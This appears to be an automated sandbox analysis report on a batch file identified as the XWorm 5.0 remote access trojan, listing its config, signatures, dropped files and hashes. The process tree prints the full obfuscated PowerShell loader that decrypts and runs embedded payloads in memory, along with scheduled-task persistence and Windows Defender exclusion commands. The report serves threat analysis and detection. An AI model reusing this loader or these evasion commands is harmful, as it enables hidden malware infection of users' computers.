Overview

overview

10

Static

static

1

Rat.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    32s
  • max time network
    30s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    20-04-2024 10:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Rat.bat

  • Size

    557KB

  • MD5

    c88576f629b0a738df2ed3238ab890c6

  • SHA1

    158b12ab42db9a32b2570080e2fda2f4742486df

  • SHA256

    fd9af97638b947c8c1142bc54efa2668a8b65ccdfdbc2c08ff4d338bfa55620f

  • SHA512

    c090ad0c9a3734419b130311e5a812300e9c3e66e7fe2cc4c2d27e257874b6854f754e563ceff68ff6497628e4dcc42d8cb31a106609ff2b8a581f0bbb7bfe5a

  • SSDEEP

    12288:yAGRzigrEv/QWBDiqBTTxzqp3rQWh5TIi0xv/NcnESDHn2:VGtUuq1lhCth43SDW

Score
10/10
xwormpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:7000

Mutex

TQv1TZmQOLwovJma

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 3 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Rat.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:5116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HM+/uw3VIbvfzCE0IMy71A0087SFUx9DztvDpXYML44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EwTj1dlF4Nyp9MG/yZks5w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HJGzG=New-Object System.IO.MemoryStream(,$param_var); $KHsiD=New-Object System.IO.MemoryStream; $rUSlj=New-Object System.IO.Compression.GZipStream($HJGzG, [IO.Compression.CompressionMode]::Decompress); $rUSlj.CopyTo($KHsiD); $rUSlj.Dispose(); $HJGzG.Dispose(); $KHsiD.Dispose(); $KHsiD.ToArray();}function execute_function($param_var,$param2_var){ $gHVNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XBKrw=$gHVNY.EntryPoint; $XBKrw.Invoke($null, $param2_var);}$bOtAV = 'C:\Users\Admin\AppData\Local\Temp\Rat.bat';$host.UI.RawUI.WindowTitle = $bOtAV;$VXMTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bOtAV).Split([Environment]::NewLine);foreach ($JPSkT in $VXMTQ) { if ($JPSkT.StartsWith(':: ')) { $bQwAB=$JPSkT.Substring(3); break; }}$payloads_var=[string[]]$bQwAB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3244
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_479_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_479.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2792
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_479.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1980
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_479.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4436
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1932
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:2236
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HM+/uw3VIbvfzCE0IMy71A0087SFUx9DztvDpXYML44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EwTj1dlF4Nyp9MG/yZks5w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HJGzG=New-Object System.IO.MemoryStream(,$param_var); $KHsiD=New-Object System.IO.MemoryStream; $rUSlj=New-Object System.IO.Compression.GZipStream($HJGzG, [IO.Compression.CompressionMode]::Decompress); $rUSlj.CopyTo($KHsiD); $rUSlj.Dispose(); $HJGzG.Dispose(); $KHsiD.Dispose(); $KHsiD.ToArray();}function execute_function($param_var,$param2_var){ $gHVNY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XBKrw=$gHVNY.EntryPoint; $XBKrw.Invoke($null, $param2_var);}$bOtAV = 'C:\Users\Admin\AppData\Roaming\startup_str_479.bat';$host.UI.RawUI.WindowTitle = $bOtAV;$VXMTQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bOtAV).Split([Environment]::NewLine);foreach ($JPSkT in $VXMTQ) { if ($JPSkT.StartsWith(':: ')) { $bQwAB=$JPSkT.Substring(3); break; }}$payloads_var=[string[]]$bQwAB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Blocklisted process makes network request
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1696
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat" "
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4144
                  • C:\Windows\system32\net.exe
                    net file
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2064
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 file
                      8⤵
                        PID:3560
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7KdUSSC9OeCVIcrKQQO2y3pSr7kdahXrU2bQ3WxtWH0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CO38/swHIabz03JHx3ThEA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMpji=New-Object System.IO.MemoryStream(,$param_var); $wyJuj=New-Object System.IO.MemoryStream; $WceOa=New-Object System.IO.Compression.GZipStream($cMpji, [IO.Compression.CompressionMode]::Decompress); $WceOa.CopyTo($wyJuj); $WceOa.Dispose(); $cMpji.Dispose(); $wyJuj.Dispose(); $wyJuj.ToArray();}function execute_function($param_var,$param2_var){ $PpPoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aIYSy=$PpPoi.EntryPoint; $aIYSy.Invoke($null, $param2_var);}$vdyOi = 'C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat';$host.UI.RawUI.WindowTitle = $vdyOi;$faopF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($vdyOi).Split([Environment]::NewLine);foreach ($ycagG in $faopF) { if ($ycagG.StartsWith(':: ')) { $ziaik=$ycagG.Substring(3); break; }}$payloads_var=[string[]]$ziaik.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                      7⤵
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:1776
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_923_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_923.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:384
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_923.vbs"
                        8⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2836
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_923.bat" "
                          9⤵
                          • Suspicious use of WriteProcessMemory
                          PID:476
                          • C:\Windows\system32\net.exe
                            net file
                            10⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4772
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 file
                              11⤵
                                PID:4760
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7KdUSSC9OeCVIcrKQQO2y3pSr7kdahXrU2bQ3WxtWH0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CO38/swHIabz03JHx3ThEA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cMpji=New-Object System.IO.MemoryStream(,$param_var); $wyJuj=New-Object System.IO.MemoryStream; $WceOa=New-Object System.IO.Compression.GZipStream($cMpji, [IO.Compression.CompressionMode]::Decompress); $WceOa.CopyTo($wyJuj); $WceOa.Dispose(); $cMpji.Dispose(); $wyJuj.Dispose(); $wyJuj.ToArray();}function execute_function($param_var,$param2_var){ $PpPoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aIYSy=$PpPoi.EntryPoint; $aIYSy.Invoke($null, $param2_var);}$vdyOi = 'C:\Users\Admin\AppData\Roaming\startup_str_923.bat';$host.UI.RawUI.WindowTitle = $vdyOi;$faopF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($vdyOi).Split([Environment]::NewLine);foreach ($ycagG in $faopF) { if ($ycagG.StartsWith(':: ')) { $ziaik=$ycagG.Substring(3); break; }}$payloads_var=[string[]]$ziaik.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                              10⤵
                              • Blocklisted process makes network request
                              • Drops startup file
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:4108
                              • C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe
                                "C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe"
                                11⤵
                                • Executes dropped EXE
                                PID:4528
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                11⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3380
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                11⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2740
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77windows32.exe '
                                11⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:416
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77windows32.exe '
                                11⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4636
                              • C:\Windows\System32\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77windows32" /tr "C:\ProgramData\$77windows32.exe "
                                11⤵
                                • Creates scheduled task(s)
                                PID:3456
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3392
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2716
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4948
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1168
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
                      6⤵
                      • Creates scheduled task(s)
                      PID:2512

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\$77windows32.exe
            Filesize

            440KB

            MD5

            0e9ccd796e251916133392539572a374

            SHA1

            eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

            SHA256

            c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

            SHA512

            e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            df472dcddb36aa24247f8c8d8a517bd7

            SHA1

            6f54967355e507294cbc86662a6fbeedac9d7030

            SHA256

            e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

            SHA512

            06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            1a9fa92a4f2e2ec9e244d43a6a4f8fb9

            SHA1

            9910190edfaccece1dfcc1d92e357772f5dae8f7

            SHA256

            0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

            SHA512

            5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            051a74485331f9d9f5014e58ec71566c

            SHA1

            4ed0256a84f2e95609a0b4d5c249bca624db8fe4

            SHA256

            3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

            SHA512

            1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cb9070f7a07a5d3fc17121852bff6953

            SHA1

            1932f99c2039a98cf0d65bca0f882dde0686fc11

            SHA256

            6c908b4ca5b098e166b48a0e821050db43fba7299a6553be2303bee5b89545ac

            SHA512

            97b9fc5ce40b102e2c9334500f6c17625c982ff8e4afaaabd92c2468cd8deface01d7cdfd267c4f10aac123b7a6173fde85d2b531c6f134a3896a8ca5edfe1f8

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            71f5efa1b29787914ccfcf1d653837e4

            SHA1

            385a0892525346c56c5952b04321241fa4446492

            SHA256

            d17376a2ad4b5d77eb2aa8e8a95d3a3d281b7be9e07874bc9588f290c42544c9

            SHA512

            ab1c864d79f7ce9aa05ba66e482341f71a32da90456778d328c57728164ca2799d6fd50ce3c659e51fb69e5c3f835784bf53166b819ea7b97f6406af0306689c

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            f4a7be133e41437aea4e606c265ed0af

            SHA1

            7e803076c19d771c3703bf8e6e80ca7395aea497

            SHA256

            c220b93bf62845a27070a19282315a59856bfb70a4aad2f7ed14ba263ad615c9

            SHA512

            e32922b3e30b78b2bbeece2f55e91efb809a24065675276615017942a047350cfd3c0ccee6ceed6889394eb3618824ad1c174beec7ac792db180af2f5cc36b6a

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat
            Filesize

            300KB

            MD5

            9b737397e1ec36cdbefaabfa9ed6d7b0

            SHA1

            a30c4a13b435a8242a6d6e1e9d7f96ee77b38a8e

            SHA256

            7841dbc3907dcae8378e078183c37b315f76b5ecd3b310e7b4fe174839b97abf

            SHA512

            717865678e03f07a38cdb83ec8fe83f370266a9f697c596262480786252b8afcec9bf1a9ccb213c2d5d3285e94755d1bbc6cf24c2df80a11293b357861ce4239

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe
            Filesize

            47KB

            MD5

            d5511e6b8d49c09cd0d53065c7dab0e0

            SHA1

            8d9820c3c6f186cecc9798d074132085c1b9f9eb

            SHA256

            1b9a81a2fc7941367b1fe337c1cca18c6a45d577c212f82da3c69eae05698e49

            SHA512

            b5a332db858ca5cea7824534d751b8e9af386e7c5602d4b07261ca990eec0668112975479c722408a228ed32e54a1adf14b107ebf49fe9c940cedbb6ae803169

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fmovlihp.pgb.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Roaming\startup_str_479.bat
            Filesize

            557KB

            MD5

            c88576f629b0a738df2ed3238ab890c6

            SHA1

            158b12ab42db9a32b2570080e2fda2f4742486df

            SHA256

            fd9af97638b947c8c1142bc54efa2668a8b65ccdfdbc2c08ff4d338bfa55620f

            SHA512

            c090ad0c9a3734419b130311e5a812300e9c3e66e7fe2cc4c2d27e257874b6854f754e563ceff68ff6497628e4dcc42d8cb31a106609ff2b8a581f0bbb7bfe5a

            Download Submit

          • C:\Users\Admin\AppData\Roaming\startup_str_479.vbs
            Filesize

            115B

            MD5

            2945c6e51ed4a19ec08d765f909c6738

            SHA1

            e4544188d5c1b4fac3c5a16e3fa6fe0bf621e688

            SHA256

            b7c487af3a804a4e21b66d9a7d1a5f2ea7bc9b3bcb1b92f0b4e66da7afc8262c

            SHA512

            6cf14612802392229f85532d9911aa1f75ee80e623daa77ce770a2a6075d509c1c4ea169b91fa155c1fe0662426a598362101b06a4c64958fcb3b7629ba41e23

            Download Submit

          • C:\Users\Admin\AppData\Roaming\startup_str_923.vbs
            Filesize

            115B

            MD5

            8e4adbf152361539e19c69862a93ff8d

            SHA1

            7f69dab4242546156aba9c5be14064068113fc55

            SHA256

            0a773b5f02f4bfb92748278e1c0e48b5672ff703aaa985e63b0856ef28bc2faa

            SHA512

            f70e076e47d52056de252f4b2f09adc8cf79f19e852f10cf6e492e7384e04cd1c58c29fbbac0e49777c63882d1776e5f86b85f939b5057b11fcc6d0f73353ca2

            Download Submit

          • \??\PIPE\srvsvc
            MD5

            d41d8cd98f00b204e9800998ecf8427e

            SHA1

            da39a3ee5e6b4b0d3255bfef95601890afd80709

            SHA256

            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

            SHA512

            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

            Download Submit

          • memory/384-90-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/384-88-0x0000015A725E0000-0x0000015A725F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/384-86-0x0000015A725E0000-0x0000015A725F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/384-85-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1696-50-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1696-126-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1696-51-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1696-54-0x000001C4DA210000-0x000001C4DA220000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1696-49-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1696-47-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1696-110-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1696-125-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1696-129-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1776-72-0x0000014768810000-0x0000014768818000-memory.dmp

            Filesize

            32KB

            Download

          • memory/1776-71-0x00000147686E0000-0x00000147686F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1776-69-0x00000147686E0000-0x00000147686F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1776-73-0x0000014768AC0000-0x0000014768B00000-memory.dmp

            Filesize

            256KB

            Download

          • memory/1776-70-0x00000147686E0000-0x00000147686F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1776-68-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1776-132-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1776-133-0x00000147686E0000-0x00000147686F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1776-134-0x00000147686E0000-0x00000147686F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1776-148-0x00000147686E0000-0x00000147686F0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2716-187-0x000001D325F10000-0x000001D325F20000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2716-186-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2716-188-0x000001D325F10000-0x000001D325F20000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2740-174-0x0000018DBE140000-0x0000018DBE150000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2740-173-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2740-175-0x0000018DBE140000-0x0000018DBE150000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2792-15-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/2792-17-0x00000249251B0000-0x00000249251C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2792-16-0x00000249251B0000-0x00000249251C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2792-26-0x00000249251B0000-0x00000249251C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2792-27-0x00000249251B0000-0x00000249251C0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2792-30-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3244-13-0x0000019FE0060000-0x0000019FE00E0000-memory.dmp

            Filesize

            512KB

            Download

          • memory/3244-9-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3244-11-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

            Filesize

            64KB

            Download

